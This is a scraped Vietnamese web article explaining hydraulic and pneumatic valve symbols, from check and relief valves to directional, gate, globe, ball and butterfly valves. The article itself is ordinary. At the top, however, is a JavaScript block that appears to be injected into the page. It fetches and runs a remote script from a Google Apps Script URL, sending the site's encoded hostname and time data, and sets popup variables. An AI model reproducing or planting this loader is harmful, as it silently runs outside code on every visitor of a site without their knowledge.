var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Giải thích các loại ký hiệu van thủy lực, van khí nén

Hiểu biết về các loại ký hiệu van khí nén, van thủy lực sẽ giúp khách hàng có thể dễ dàng lên sơ đồ và thiết kế 1 hệ thống làm việc hiệu quả, năng suất, đơn giản nhưng vẫn tiết kiệm không gian, chi phí. Nào hãy cùng chúng tôi tìm hiểu về các ký hiệu đặc biệt này nhé!

ký hiệu van

Ký hiệu các loại van khí nén, van thủy lực

Có rất nhiều loại van thủy lực, van khí nén nhưng chúng tôi chỉ chọn giới thiệu một số van và ký hiệu các loại van trong bản vẽ thông dụng nhất để khách hàng tham khảo.

Ký hiệu van 1 chiều

Trong hệ hống khí nén, thủy lực, chúng ta thường bắt gặp nhất là các van 1 chiều. Nó được lắp tại nhiều vị trí khác nhau trên đường ống dẫn. Chức năng của nó là chỉ cho dòng chất đi theo 1 chiều duy nhất, ngăn chặn việc dòng chất chảy ngược lại một cách hiệu quả.

Cụ thể, trong hệ thống thủy lực, van này tham gia bảo vệ bơm tránh các sự cố khi gặp dòng dầu chảy ngược. Nó còn chống trôi tụt xi lanh khi làm việc với tải trọng lớn, đảm bảo an toàn.

Một số dây chuyền thủy lực có yêu cầu dòng chất mang áp suất và chỉ khi dòng chất đạt mức áp suất nhất định thì van 1 chiều mới hoạt động thì người ta sẽ dùng van một chiều lò xo. Tùy theo hệ thống mà khách hàng có thể sử dụng van 1 chiều thông thường hoặc van 1 chiều có lò xo.

Các ký hiệu van 1 chiều:

Ký hiệu van 1 chiều
Ký hiệu van một chiều định áp

Ký hiệu van giảm áp

Đây là ký hiệu van thủy lực giảm áp thuộc nhóm van áp suất. Nhiệm vụ của nó là giảm áp suất làm việc của hệ thống, có nghĩa là áp suất ở cửa ra của van luôn luôn nhỏ hơn áp suất đầu vào.

ký hiệu van giảm áp
Ký hiệu van giảm áp

Hệ thống thủy lực phức tạp sẽ cần 2 đường ống với 2 mức áp suất khác nhau theo yêu cầu làm việc, để vừa có thể đảm bảo áp cao cho chấp hành vừa giúp các thiết bị khác không bị phá hủy vì áp cao. Giải pháp tiết kiệm nhất được đưa ra đó là sử dụng 1 bơm áp cao kết hợp với van giảm áp.

Tham khảo thêm những ký hiệu thủy lực, khí nén thường dùng trong bản vẽ

Ký hiệu van an toàn

Tên van cũng đã cung cấp cho chúng ta một phần thông tin về chức năng của nó đó là giúp cho áp suất của hệ thống luôn ở trong phạm vi an toàn, không vượt qua mức áp đã được cài đặt sẵn.

Trong quá trình vận hành, nếu áp suất tăng quá cao, vượt mức quy định thì van sẽ lập tức mở cửa để dòng dầu có thể chảy về bể chứa nhằm hạ áp. Việc này sẽ diễn ra cho đến khi áp về lại mức an toàn..

Từ đó, van có thể bảo vệ đường ống dẫn dầu, bơm và các thiết bị khác trong hệ thống không bị phá hủy bởi quá áp.

Người ta thường ký hiệu van an toàn trong bản vẽ như sau:

Ký hiệu van an toàn

Ký hiệu van tiết lưu

Trong hệ thống thủy lực hay khí nén luôn luôn có van tiết lưu. Chức năng duy nhất của nó là điều chỉnh lưu lượng của dòng chất lỏng hoặc dòng khí qua van. Qua đó, nó tham gia vào việc điều chỉnh gián tiếp vận tốc của xi lanh, các thiết bị chấp chậm lại hoặc nhanh hơn theo từng yêu cầu cụ thể của người dùng.

Theo chúng tôi thì việc điều chỉnh tốc độ của xi lanh khí hay xi lanh dầu bằng cách lắp và sử dụng các van tiết lưu là đơn giản nhất nhưng vẫn đảm bảo hiệu quả và cho người sử dụng hệ thống thủy lực và đặc biệt là có thể tiết kiệm chi phí.

Tương tự như với các thiết bị khác, van cũng hoạt động dựa trên nguyên lý rõ ràng. Lưu lượng của dòng chất sẽ phụ thuộc vào yếu tố tiết diện của dòng chảy khi đi qua van. Nếu tiết diện càng lớn thì lưu lượng dòng khí nén đi qua van càng lớn và nếu tiết diện càng bé thì lưu lượng dòng chất càng nhỏ.

Người ta phân chia thành 3 loại có ký hiệu van tiết lưu như sau:

ký hiệu van tiết lưu 1 chiều
Ký hiệu van tiết lưu 1 chiều
Ký hiệu van tiết lưu cố định
ký hiệu van tiết lưu có điều chỉnh
Ký hiệu van tiết lưu có điều chỉnh

Ký hiệu van đảo chiều

Van đảo chiều có nhiều loại nên Valve symbols cũng nhiều: 3/2, 4/3, 4/2, 5/3, 5/2.

Van đảo chiều 3/2

Van đảo chiều hay còn gọi là van phân phối 3/2 đơn giản với 2 vị trí trái, phải và 3 cửa làm việc: vào, xả, làm việc. Tùy thuộc vào tín hiệu cấp cho van mà van sẽ ở trạng thái 1 hoặc 2.

Ở trạng thái 1, khí nén hay dầu sẽ được dẫn vào khoang bên trái. Và khoang bên phải lại không chứa dầu, khí. Dầu hay khí nén xi lanh lúc này sẽ không về thùng chứa từ khoang phải. Và lưu ý, xi lanh chỉ có 1 lần sinh công duy nhất.

Van phân phối 3/2 thích hợp cho hệ thống sử dụng xi lanh 1 chiều để làm việc.

Ký hiệu van điện từ 3/2 đơn giản nhất:

Ký hiệu van phân phối 3/2

Van phân phối 4/3

Một số hệ thống lại sử dụng van phân phối 4/3. Dựa trên ký hiệu của van, ta có:

+ Cửa T: Cửa xả

+ Cửa P: Cửa vào

+ Cửa A, B: Cửa làm việc

+ Ba vị trí làm việc: Trái, phải, giữa

Tùy thuộc vào vị trí của lõi van mà dầu sẽ đi lên và hồi về từ 1 trong 2 cửa A hay cửa B, các cửa sẽ thông với nhau hay không

Nếu lõi van ở chính giữa, van có trạng thái bình thường. Xi lanh sẽ không chuyển động, cửa dầu vào và cửa dầu xả đóng.

ký hiệu van phân phối 4/3
Ký hiệu van phân phối 4/3

Van sẽ ở trạng thái 2, trạng thái 3 khi có sự tác động của lực cơ học hoặc lực điện từ. Lõi van sẽ dịch chuyển về vị trí phải hoặc vị trí trái. Dòng chất sẽ được đi từ cửa P lên cửa A. Sau khi làm việc xong, dòng chất này sẽ sẽ đi từ cửa B xuống cửa T.

Van đảo chiều 5/2

Tương tự như với van phân phối 4/2 thì ký hiệu van khí nén 5/2 cũng có 2 vị trí làm việc nhưng điểm khác là 5 cửa với: 2 cửa xả, 2 cửa làm việc, 2 cửa vào. Thường với những hệ thống mà xi lanh làm việc liên tục, tần suất tiến lùi cao và luân phiên thì lựa chọn van phân phối 5/2 rất hiệu quả.

ký hiệu van phân phối 5/2
Ký hiệu van phân phối 5/2

Van phân phối 5/3

Đây là Valve symbols phân phối khí nén 5/3. Nhìn vào ký hiệu ta có thể xác định được rõ 3 vị trí làm việc gồm: trái, phải, giữa và 5 cửa với 2 cửa làm việc, 1 cửa vào, 2 cửa xả.

Van phân phối 5/3 khí hay van 5/3 thủy lực đều là lựa chọn của nhiều khác hàng khi cần điều khiển xi lanh dầu 2 chiều để đứng nguyên vị trí hoặc tiến, lùi.

ký hiệu van phân phối 5/3
Ký hiệu van phân phối 5/3

Ký hiệu van cổng

Van cổng có tên tiếng anh là Gate Valve. Nó chủ yếu dùng cho các hệ thống thủy lực với dòng chảy chất thẳng và áp lực rất cao. Nó được thiết kế với 2 cánh hình tròn bằng kim loại để nâng lên và hạ xuống.

Ký hiệu của van cổng là 2 hình tam giác có 1 đường thẳng đứng ở giữa để phân cách. Với ký hiệu đơn giản, chúng ta có thể nhận biết nhanh chóng van cổng trên bản vẽ. Có 3 cách để lắp đặt van: lắp mặt bích, lắp socket, lắp hàn.

ký hiệu van cổng

Ký hiệu van cầu

Van cầu tên tiếng anh là Globe Valve. Đặc điểm của van này đó là có dạng cầu với 2 phần thân van được ngăn cách ở giữa bởi bộ phận kiểm soát dòng chảy. Chức năng của nó là điều chỉnh dòng chảy của lưu chất.

Ký hiệu của van cầu là 1 chấm tròn nhỏ, đặt nằm ở giữa 2 đỉnh hình tam giác. Hình này sẽ đặc trưng cho van có hình cầu. Tương tự như với van cổng, van cầu có 3 kiểu lắp ghép: lắp bích, lắp hàn và lắp socket.

ký hiệu van cầu

Ký hiệu van bi

Van bi tên tiếng anh là Ball Valve. Đây là 1 van công nghiệp có ứng dụng rộng rãi ở nước ta. Hoạt động của van này nhờ vào viên bi có lỗ và rỗng ở bên trong. Nó có thể xoay 90 độ để điều chỉnh dòng chất đi qua nó. Một số loại van bi: Van bi tay gạt, van bi 3 ngã, van bi mặt bích, van bi điều khiển điện, van bi điều khiển khí nén.

Ký hiệu van bi là 1 hình tròn có 2 tam giác đối đỉnh vào nhau ở bên trong. Tam giác này sẽ tượng trưng cho bi tròn ở bên trong van. Trên valve symbols bi, ta có thể thấy rõ 3 kiểu kết nối: nối hàn, nối bích và nối socket.

kiếu hiệu van bi

Ký hiệu van bướm

Van bướm là loại van thủy lực, khí nén được sử dụng trong công nghiệp, có thiết kế dạng hình cánh bướm. Van dùng để đóng mở hay điều tiết dòng chất khí, chất lỏng đi qua van nhờ vào đĩa van quay quanh trục với góc độ khác nhau. Một số loại van bướm hiện có trên thị trường: Van bướm tay gạt, van bướm tay quay, van bướm điều khiển bằng khí, van bướm điều khiển bằng điện…

ký hiệu van bướm

Ký hiệu của van khá đơn giản. Nó không sử dụng hình tam giác như các valve symbols bi trước đó. Nó sử dụng chữ Z đặt nằm ngang và có 1 chấm tròn ở giữa. Trên hình, chúng ta cũng có thể thấy rõ 2 cách lắp đặt van gồm: Lắp mặt bích, lắp kiểu hàn.